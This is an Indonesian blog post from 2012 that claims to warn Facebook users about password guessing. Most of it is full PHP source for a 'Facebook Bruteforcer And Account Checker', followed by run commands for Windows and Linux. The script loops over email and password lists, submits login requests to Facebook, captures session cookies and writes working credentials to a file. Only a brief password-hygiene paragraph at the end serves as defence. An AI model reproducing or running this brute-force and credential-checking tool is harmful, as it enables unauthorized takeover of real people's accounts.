Rabu, 08 Agustus 2012

Hacking Facebook ? What the Hell Was That ? mungkin kata yang satu itu udah ga asing lagi di telinga para pengguna Facebook, dari anak SD ampe nenek kakek yang make Facebook pasti ga asing dengan kata-kata "facebook saya di hack" atau "waduh facebook saya kena hack, mungkin anda yang sedang membaca tulisan ini juga pernah mengatakan hal serupa, tetapi pada dasarnya tau kah anda bahwa kejadin-kejadin seperti itu bukanlah "KENA HACK" melainkan kena CRACK, karena Hacker dan Cracker itu berbeda, dan taukah anda bahwa kejadian sperti itu bukan karena Si Cracker Jago atau Hebat atau Keren, Melainkan Karena Kelalaian kita (pengguna Facebook). pikir sendiri kenapa ?
Capek Mikir ? ya akun facebook kena hack karena kelalaian kita, seperti memberikan password berupa kata yang mudah di tebak, seperti nama pacar, hari ulang tahun pacar, nama orang terdekat, nama belakang, nama ayah, tanggal lagir dan kata lainya yang mudah untuk di pridiksi dari informasi diri kita, selain itu kebanyakan user (pengguna internet) malas menggunakan Antivirus yang menyediakan Firewall, atau Spyware, sehingga program-program jahat bisa saja mengambil data penting dari komputer yang kita gunakan tanpa kita sadari, Selain itu juga jaman sekarang sudah berubah, bisa masuk ke akun facebook orang lain saja sudah di anggap sebagai seorang hacker, padahal cuman masuk mengguanakn password tidak sengaja di tebak, atau malahan bikin akun trus masuk sendiri (lebay)

Belajar Menjadi Cracker ?

Tulisan saya ini bertujuan untuk memperkenalkan salah satu dari sejuta cara menjadi Cracker, tulisan ini bukan untuk mengajari anda menjadi orang yang jahat, melainkan menunjukan cara bagaiaman seorang Cracker bisa menembus akun facebook kita sehingga nantinya kita bisa terhindar dari kejahilan para cracker dunia maya ini, pada intinya seorang attacker akan mengumpulkan informasi sebanyak-banyak nya dari koraban, nantinya informasi itu akan disusun menjadi sebuah koleksi kata yang mungkin akan menjadi password dari si korban, di lain hal attacker juga sudah mempunyai banyak koleksi akun facebook yang sudah ia dapatkan, dan ingin memeriksa akun tersebut masih bisa digunakan atau tidak
teknik Cracker yang satu ini memang sudah tidak asing lagi, biasa di sebut dengan tebak-tebakan password, atau bruteforcing, pada tulisan-tulisan sebelumnya saya sudah membahas apa itu Password Bruteforcing, secara manual Akun Bruteforcing ini dilakukan dengan memasukan password yang mungkin satu demi satu, sehingga jika ada kemungkinan password sebanyak 150 kata maka kita harus memasukan password sebanyak 150 kali, melelahkan bukan menjadi seorang Cracker (dalam kasus menembus akun facebook), trus gimana caranya ?

Tools

Banyak tools yang bisa kita gunakan untuk melakukan Bruteforcing Facebook akun, jika kita search di google mungkin hasilnya akan banyak, dari yang berbayar dan tidak berbayar, tentu saja kalau mau mendowload tools tersebut harus siap dengan resiko yang tak terduga, seperti trojan, mallware atau worm, saya tidak menyarankan teman-teman untuk mendownload tools-tools tersebut, karena dalam tulisan ini saya sudah menyertakan tools gratis untuk melakukan Facebook Bruteforce, saya membuatnya dengan bahasa PHP (cuman bisa itu) jadi ga perlu khawatir dengan yang namanya virus atau trojan, berikut source codenya
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
<?php
/*
 * Facebook Bruteforce V.1.2
 * Coder : wenkhairu (c) 2012
 *
 * Cleaning up bad coding (I'm a bad coder, what can I say!
 * Do It Your Own Way
 *
 * for My Brother aerul_shinobi
*/
class Facebook{
     
    var $file='file.txt';
    var $file_email = 'email.txt';
    var $dict = 'dict.txt';
    var $url = 'http://www.facebook.com/';
     
 
    function __construct($option){
        switch($option){
            case '-c':
                $this->logo();
                $this->_cek();
            break;
            case'-b':
                $this->logo();
                $this->_brute_forcing();
            break;
            default:
                $this->logo();
                echo "[!] Eg: php facebook.class.php [option]\n";
                echo "[+] option -c (cek) or -b (brute forcing)\n\n";
            break;
        }
         
    }
     
    function logo()
    {
    print_r('
    .___          .__.__                _______       .___    
  __| _/_______  _|__|  | ________ ____ \   _  \    __| _/____
 / __ |/ __ \  \/ /  |  | \___   // ___\/  /_\  \  / __ |/ __ \
/ /_/ \  ___/\   /|  |  |__/    /\  \___\  \_/   \/ /_/ \  ___/
\____ |\___  >\_/ |__|____/_____ \\___  >\_____  /\____ |\___  >
     \/    \/                   \/    \/       \/      \/    \/
        Facebook Bruteforcer And Account Checker Attack v.1.2
        coder : wenkhairu (c) 2012 devilzc0de
        for my Brother : airuel_shinobi (at) subussalam
    ');
          
        print "\n\n";
    }
 
    function _cek_filesize($f){
        if($s = filesize($f)){
            if($s <= 1024) return $s." byte";
            else{
                if($s <= 1024*1024) {
                    $s = round($s / 1024,2);;
                    return $s." kb";
                }
                else {
                    $s = round($s / 1024 / 1024,2);
                    return $s." mb";
                }
            }
        }
        else return "???";
    }
     
 
    function _do_login($email, $pass){
        $login = $this->login_checker("https://login.facebook.com/login.php?login_attempt=1",true,null,"email=".$email."&pass=".$pass."");
        preg_match('%Set-Cookie: ([^;]+);%',$login,$hasil);
        $cek = $this->login_checker("https://login.facebook.com/login.php?login_attempt=1",true,$hasil[1],"email=".$email."&pass=".$pass."");
        preg_match_all('%Set-Cookie: ([^;]+);%',$cek,$akhir);
        for($i=0;$i<count($akhir[0]);$i++){$cookie.=$akhir[1][$i].";";}
        $is_login = $this->login_checker($this->url,null,$cookie,null);
        if(preg_match_all("(<a.*?href=[\"']([^\"']+)[\"'][^>]?>(.*?)</a>)i",$is_login,$loged)){
            if(count($loged[0]) > 1){
                    echo "[+] Login Success\n";
                    echo "[+] Login With Email: ".$email." And Password: ". $pass."\n";
                    $this->good_acc("[+] Login With Email: ".$email." And Password: ". $pass."\n");
            }else{
                echo "[!] Login Failed\n";
            }
        }else{
            echo "[!] Login Failed\n";
        }
    }
     
 
    function _cek(){
        $plain = fopen($this->file,'r');
        echo "[+] Dictionary Size :" .$this->_cek_filesize($this->file)."\n";
        echo "[+] Please Wait ....\n";
        sleep(1);
        echo "[+] Starting At". date('d m Y H:i:s')."\n";
        while(!feof($plain))
        {
            $cek = explode(":",trim(fgets($plain)));
            $username = $cek[0];$password=$cek[1];
            $this->_do_login($username, $password);
            echo "[!] Resting... (5)s For Stable Connections\n";
            sleep(10);         
        }
        fclose($plain);
    }
     
    function _brute_forcing(){
        $email_file = fopen($this->file_email,'r');
        echo "[+] Dictionary Email Size :" .$this->_cek_filesize($this->file_email)."\n";
        $pass_file = fopen($this->dict,'r');
        echo "[+] Dictionary Password Size :" .$this->_cek_filesize($this->dict)."\n";
        echo "[+] Please Wait ....\n";
        sleep(1);
        echo "[+] Starting At". date('d m Y H:i:s')."\n";
        while(!feof($email_file))
        {
            $username = trim(fgets($email_file));
            while(!feof($pass_file))
            {
                $password = trim(fgets($pass_file));
                $this->_do_login($username, $password);
                echo "[!] Resting... (5)s For Stable Connections\n";
                sleep(10);         
            }
            fclose($plain);    
        }
        fclose($plain);
    }
     
 
    function login_checker($url, $header=NULL, $cookie=NULL, $post=NULL){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, $header);
        curl_setopt($ch, CURLOPT_NOBODY, $header);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1) ");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);        
        if ($post) {
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        }
         
        $result = curl_exec($ch);
          
        if($result){
            return $result;
        }else{
            return curl_error($ch);
        }
        curl_close($ch);
    }  
     
    function good_acc($log){
        $file_name="good_account.txt";
        $fp = fopen ($file_name, "a+");
        fwrite ($fp,$log);
        fclose ($fp);
    }
}
 
$tes = new Facebook($argv[1]);
 
?>
Tools tersebut akan melakukan bruteforcing dan melakukan pemeriksaan akun facebook yang sudah di ambil alih, jika akun yang di cek maupun akun yang di brute masih aktif dan berhasil login maka hasilnya akan di simpan dalam file baru dengan nama good_account.txt, cara menggunakannya cukup simple, jika pengguna windows hanya menjalankan melalui command prompt dan pastikan extensi curl pada php sudah di aktifkan, sedangkan untuk pengguna linux cukup jalankan terminal dan jangan lupa install curl tentunya, berikut cara menjalankannya
1
2
3
4
5
6
7
8
9
#file bat untuk windows
#untuk melakukan check akun facebook yang  ada gunakan option -c
#sedangkan untuk melakukan bruteforcing gunakan option -b
cls
C:\xampplite\php\php.exe facbook.php [option]
pause
 
#untuk linux
php facbook.php [option]


Nah cukup mudah kan menjadi seorang Cracker ? hanya dengan sedikit kemampuan anak-anak juga bisa menjadi Cracker, hanya memanfaatkan tools-tools yang bertebaran di internet siapa saja bisa menjadi siapa saja, penulis tidak bertanggung jawab atas apa yang terjadi akibat tools buatan penulis, kalo mau nyoba ya tanggung resiko sendiri ya,

Pencegahan

Cukup simple untuk mencegah akun kita di retas, bahkan dengan tools bruteforcing yang berbayar sekali pun, gunakan lah password yang tidak umum, seperti gabungan huruf dan angka, jangan gunakan password dengan nama pacara atau kata yang berasal dari informasi diri anda, gunakan password yang berbeda untuk setiap akun anda, gunakan antivirus yang bagus, dan terakhir Thanks For reading, Download Script Full